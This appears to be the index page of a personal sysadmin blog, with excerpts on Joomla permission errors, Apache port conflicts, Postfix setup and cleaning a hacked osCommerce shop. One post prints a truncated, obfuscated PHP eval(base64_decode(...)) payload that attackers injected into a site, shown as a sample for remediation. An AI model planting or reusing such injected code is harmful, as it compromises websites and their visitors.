Posts

JFolder::create: Could not create directory

I got this weird problem in Jommla where I cannot install this module. Since we also have access to our own server I checked the following as stated on some other websites monstly on joomla's site. (directories might be differ but we will be talking about your installation directory) in you installation directory check the tmp folder change permission to 777 then change back to 755 after you check if the installation continues. If this solve the problem you need to fix folder and file permission. DO NOT LEAVE tmp at 777 !!! check logs directory (though i dont know why some stated this) also check logs for the problems this where the tail command comes handy. check the configuration.php and look for these lines  var $log_path = '/home/freakazoid/logs';  var $tmp_path = '/home/freakazoid/tmp'; change these to some folder where there is read/write access (A SECURE ONE) I changed my default tmp to global tmp var $tmp_path = './tmp'; this wi...

Address already in use: make_sock: could not bind to address - Apache - HTTPD Error

Image
Address already in use: make_sock: could not bind to address - Apache - HTTPD Error The problem is the apache is running but in webmin it says it's down (some say it's the PID) so I check who is using the port [root@jmaz] netstat -lnp | grep :80 In webmin you can check the process in Webmin->System-> Running Process and kill the process there just kill them all [root@jmaz] killall httpd [root@jmaz] service httpd start

DDOS Deflate fix for wrong email format sent

This one is a fix for the wrong email sent by ddos deflate. edit the configuration and use this line. netstat -ntu | grep ':' | awk '{print $5}' | sed 's/::ffff://' | cut -f1 -d ':' | sort | uniq -c | sort -nr

A encoded script in one of the hacked sites using oscommerce

 A code that was injected to one of the oscommerce sites <?php eval(base64_decode("ZnVuY3Rpb24gZXZhbGhJT29MZ0xLWlltdEooJHMpe2ZvciAoJGEgPSAwOyAkYSA8PSBzdHJsZW4oJHMpLTE7ICRhKysgKXskZSAuPSAkc3tzdHJsZW4oJHMpLSRhLTF9O31yZXR1cm4oJGUpO31ldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPTAzT3BBVFdMbEdUUnhtYzBsa1VxNTBUc0ZtZGxSQ0tsUjJialZHWmZSak5sTlhZaUJpYnlWSGRsSjNlZ2tDTVp0VWFNRkZieVJYU1NwbVRQeFdZMlZHSm9rMVNweFVVc0pIZEpKbGFPOUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGhJT29MZ0xLWlltdEooJzspKSI9c1RLaTBUUDNKV2IxY1ZZaWdTV0xsR1RSeG1jMGxrVXE1MFRzRm1kbEJTUGdFMVFTRjNZVGwzVklKbFJ5UlZUNXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiN2tpSTkwRVNraG1Vek1tSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWjlNa1laSlZkaGhsZXhsRVMzVjBhd3hXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPXNUS2kwVFBCTkdNU2hVWWlnU1dMbEdUUnhtYzBsa1VxNTBUc0ZtZGwxamUybFhlcVYwWmhSM1EycEhjRnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPXN...

Running Linux on Virtual Box

Linux is one of the operating systems out there that is free no need to pay just download and install. For new technical people that want to use this piece of software (yes it's a software not a food) you can download ubuntu, or centos (my choice or even fedora) at Distrowatch.Com where before I check always for new distribution. Like microsoft it has many types example microsoft has windows xp, 2000, Me, 98 Vista, Windows 7 Linux has much more. Linux is like the DOS prompt then developers begin to create window managers for it so it looks like your average windows now. Very easy to install and use. Though you don't want to erase your 1 million dollar software pre installed in your alienware box you have the alternative to use virtualbox the free emulator (something like that in layman's term) you install this first and you can install linux inside the virtualbox like a window when you play windowed games like ragnarok, flyff perfect world and other games. 2 steps ...

Troubleshooting Hacked Oscommerce

First things first, Oscommerce is a good software and we use it. Some old version that we have got hacked (before I get in to the company) To check what files are compromised check the dates of the files thiis is the most important since ou will see what are modified. The fastest way I did was to grep -r 'base64' * since the hacker injected some encrypted code it the files this will let you see what files have the code. I'm not a guru though. delete the lines that shouldn't be there Also they put codes in .htaccess and this will let your website redirect to some other sites .ru site Check also you php.ini since they also get inside of that and put this base decode blah. secure your tmp folder and chmod your file to 755. Also the last measure is to auto block the ip addresses that do lots of connection via anti ddos (dosdeflate) Well then after that hopefully the hackers will get angry and ddos your site till it gets down :)

complete email centos postfix dkim spamassassin

Remove sendmail yum remove sendmail Postfix yum install postfix yum install cyrus-sasl cyrus-sasl-devel cyrus-sasl-gssapi cyrus-sasl-md5 cyrus-sasl-plain /etc/postfix/main.cf myhostname = mail.example.com mydomain = example.com myorigin = $mydomain home_mailbox = Maildir/ mailbox_command = mynetworks = 127.0.0.0/8 inet_interfaces = all mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain relay_domains = local_recipient_maps = smtpd_sasl_local_domain = smtpd_sasl_auth_enable = yes smtpd_sasl_type = cyrus smtpd_sasl_security_options = noanonymous broken_sasl_auth_clients = yes smtpd_sasl_authenticated_header = yes smtpd_recipient_restrictions = permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination /etc/postfix/master.cf smtps inet n - n - - smtpd -o smtpd_sasl_auth_enable=yes -o smtpd_reject_unlisted_sender=yes -o smtpd_recipient_restrictions=permit_sasl_authenticated,reject -o broken_...